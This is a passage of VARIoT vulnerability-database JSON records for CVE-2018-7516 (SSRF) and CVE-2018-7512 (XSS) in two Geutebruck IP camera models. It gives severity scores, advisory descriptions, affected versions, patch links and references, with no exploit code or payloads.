"cve": "CVE-2018-7516",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2018-7516",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-06022",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "e2e7221e-39ab-11e9-a995-000c29342cb1",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-137548",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"id": "CVE-2018-7516",
"impactScore": 3.4,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-7516",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2018-7516",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2018-06022",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201803-765",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "IVD",
"id": "e2e7221e-39ab-11e9-a995-000c29342cb1",
"trust": 0.2,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-137548",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06022"
},
{
"db": "VULHUB",
"id": "VHN-137548"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003342"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-765"
},
{
"db": "NVD",
"id": "CVE-2018-7516"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A server-side request forgery vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which could lead to proxied network scans. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. There is a server-side request forgery vulnerability in GeutebruckIPCameras, which can be exploited by attackers. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. \n1. An authentication-bypass vulnerability\n2. A SQL-injection vulnerability\n3. A cross-site request-forgery vulnerability\n4. An access-bypass vulnerability\n5. A security-bypass vulnerability\n6. A cross-site scripting vulnerability\nAttackers may exploit these issues to gain unauthorized access to the affected device, or to bypass certain security restrictions to perform unauthorized actions, to compromise the application to access or modify data and to exploit vulnerabilities in the underlying database, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site or to execute arbitrary code within the context of the affected device. \nThe following devices are vulnerable:\nGeutebruck G-Cam/EFD-2250 version 1.12.0.4\nGeutebruck Topline TopFD-2125 version 3.15.1. Geutebr\u00fcck G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebr\u00fcck company. An attacker could exploit this vulnerability to scan proxy networks",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7516"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003342"
},
{
"db": "CNVD",
"id": "CNVD-2018-06022"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "IVD",
"id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
},
{
"db": "VULHUB",
"id": "VHN-137548"
}
],
"trust": 2.7
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7516",
"trust": 3.6
},
{
"db": "ICS CERT",
"id": "ICSA-18-079-01",
"trust": 3.4
},
{
"db": "BID",
"id": "103474",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-201803-765",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2018-06022",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003342",
"trust": 0.8
},
{
"db": "IVD",
"id": "E2E7221E-39AB-11E9-A995-000C29342CB1",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-137548",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06022"
},
{
"db": "VULHUB",
"id": "VHN-137548"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003342"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-765"
},
{
"db": "NVD",
"id": "CVE-2018-7516"
}
]
},
"id": "VAR-201803-2210",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06022"
},
{
"db": "VULHUB",
"id": "VHN-137548"
}
],
"trust": 1.7456349166666667
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06022"
}
]
},
"last_update_date": "2024-11-23T21:53:17.738000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.geutebrueck.com/en_EN.html"
},
{
"title": "Patch for Geutebruck IPCameras Cross-Site Request Forgery Vulnerability (CNVD-2018-06022)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/122841"
},
{
"title": "Geutebr\u00fcck G-Cam/EFD-2250 and Topline TopFD-2125 Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79351"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06022"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003342"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-765"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-918",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-137548"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003342"
},
{
"db": "NVD",
"id": "CVE-2018-7516"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.4,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-18-079-01"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/103474"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7516"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7516"
},
{
"trust": 0.3,
"url": "http://www.geutebrueck.com/en_en/product-overview-31934.html"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06022"
},
{
"db": "VULHUB",
"id": "VHN-137548"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003342"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-765"
},
{
"db": "NVD",
"id": "CVE-2018-7516"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06022"
},
{
"db": "VULHUB",
"id": "VHN-137548"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003342"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-765"
},
{
"db": "NVD",
"id": "CVE-2018-7516"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-22T00:00:00",
"db": "IVD",
"id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
},
{
"date": "2018-03-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-06022"
},
{
"date": "2018-03-22T00:00:00",
"db": "VULHUB",
"id": "VHN-137548"
},
{
"date": "2018-03-20T00:00:00",
"db": "BID",
"id": "103474"
},
{
"date": "2018-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-003342"
},
{
"date": "2018-03-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-765"
},
{
"date": "2018-03-22T18:29:00.900000",
"db": "NVD",
"id": "CVE-2018-7516"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-06022"
},
{
"date": "2019-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-137548"
},
{
"date": "2018-03-20T00:00:00",
"db": "BID",
"id": "103474"
},
{
"date": "2018-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-003342"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-765"
},
{
"date": "2024-11-21T04:12:16.843000",
"db": "NVD",
"id": "CVE-2018-7516"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-765"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Geutebruck G-Cam/EFD-2250 and Topline TopFD-2125 Server-side request forgery vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-003342"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Code problem",
"sources": [
{
"db": "IVD",
"id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-765"
}
],
"trust": 0.8
}
}
VAR-201803-2207
Vulnerability from variot - Updated: 2024-11-23 21:53A cross-site scripting vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which may allow remote code execution. Geutebruck G-Cam/EFD-2250 and Topline TopFD-2125 Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. 1. An authentication-bypass vulnerability 2. A SQL-injection vulnerability 3. A cross-site request-forgery vulnerability 4. An access-bypass vulnerability 5. A security-bypass vulnerability 6. A cross-site scripting vulnerability Attackers may exploit these issues to gain unauthorized access to the affected device, or to bypass certain security restrictions to perform unauthorized actions, to compromise the application to access or modify data and to exploit vulnerabilities in the underlying database, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site or to execute arbitrary code within the context of the affected device. The following devices are vulnerable: Geutebruck G-Cam/EFD-2250 version 1.12.0.4 Geutebruck Topline TopFD-2125 version 3.15.1. Geutebrück G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebrück company
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201803-2207",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "g-cam/efd-2250",
"scope": "eq",
"trust": 1.7,
"vendor": "geutebruck",
"version": "1.12.0.4"
},
{
"model": "topfd-2125",
"scope": "eq",
"trust": 1.6,
"vendor": "geutebrueck",
"version": "3.15.1"
},
{
"model": "g-cam\\/efd-2250",
"scope": "eq",
"trust": 1.6,
"vendor": "geutebrueck",
"version": "1.12.0.4"
},
{
"model": "topline topfd-2125",
"scope": "eq",
"trust": 0.9,
"vendor": "geutebruck",
"version": "3.15.1"
},
{
"model": "topfd-2125",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "3.15.1"
},
{
"model": "g-cam/efd-2250",
"scope": "ne",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.0.19"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "g cam efd 2250",
"version": "1.12.0.4"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "topfd 2125",
"version": "3.15.1"
}
],
"sources": [
{
"db": "IVD",
"id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06023"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003341"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-766"
},
{
"db": "NVD",
"id": "CVE-2018-7512"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebruck:topfd-2125_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-003341"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Davy Douhine of RandoriSec and Nicolas Mattiocco of Greenlock.",
"sources": [
{
"db": "BID",
"id": "103474"
}
],
"trust": 0.3
},
"cve": "CVE-2018-7512",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2018-7512",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-06023",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-137544",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2018-7512",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-7512",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2018-7512",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2018-06023",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201803-766",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-137544",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06023"
},
{
"db": "VULHUB",
"id": "VHN-137544"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003341"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-766"
},
{
"db": "NVD",
"id": "CVE-2018-7512"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A cross-site scripting vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which may allow remote code execution. Geutebruck G-Cam/EFD-2250 and Topline TopFD-2125 Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. \n1. An authentication-bypass vulnerability\n2. A SQL-injection vulnerability\n3. A cross-site request-forgery vulnerability\n4. An access-bypass vulnerability\n5. A security-bypass vulnerability\n6. A cross-site scripting vulnerability\nAttackers may exploit these issues to gain unauthorized access to the affected device, or to bypass certain security restrictions to perform unauthorized actions, to compromise the application to access or modify data and to exploit vulnerabilities in the underlying database, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site or to execute arbitrary code within the context of the affected device. \nThe following devices are vulnerable:\nGeutebruck G-Cam/EFD-2250 version 1.12.0.4\nGeutebruck Topline TopFD-2125 version 3.15.1. Geutebr\u00fcck G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebr\u00fcck company",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7512"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003341"
},
{
"db": "CNVD",
"id": "CNVD-2018-06023"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "IVD",
"id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
},
{
"db": "VULHUB",
"id": "VHN-137544"
}
],
"trust": 2.7
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7512",
"trust": 3.6
},
{
"db": "ICS CERT",
"id": "ICSA-18-079-01",
"trust": 3.4
},
{
"db": "BID",
"id": "103474",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-201803-766",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2018-06023",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003341",
"trust": 0.8
},
{
"db": "IVD",
"id": "E2E6FB0F-39AB-11E9-B666-000C29342CB1",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-137544",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06023"
},
{
"db": "VULHUB",
"id": "VHN-137544"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003341"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-766"
},
{
"db": "NVD",
"id": "CVE-2018-7512"
}
]
},
"id": "VAR-201803-2207",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06023"
},
{
"db": "VULHUB",
"id": "VHN-137544"
}
],
"trust": 1.7456349166666667
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06023"
}
]
},
"last_update_date": "2024-11-23T21:53:17.699000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.geutebrueck.com/en_EN.html"
},
{
"title": "Patch for Geutebruck IPCameras Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/122839"
},
{
"title": "Geutebr\u00fcck G-Cam/EFD-2250 and Topline TopFD-2125 Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79352"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06023"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003341"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-766"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-137544"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003341"
},
{
"db": "NVD",
"id": "CVE-2018-7512"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.4,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-18-079-01"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/103474"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7512"
},
{
"trust": 0.8,
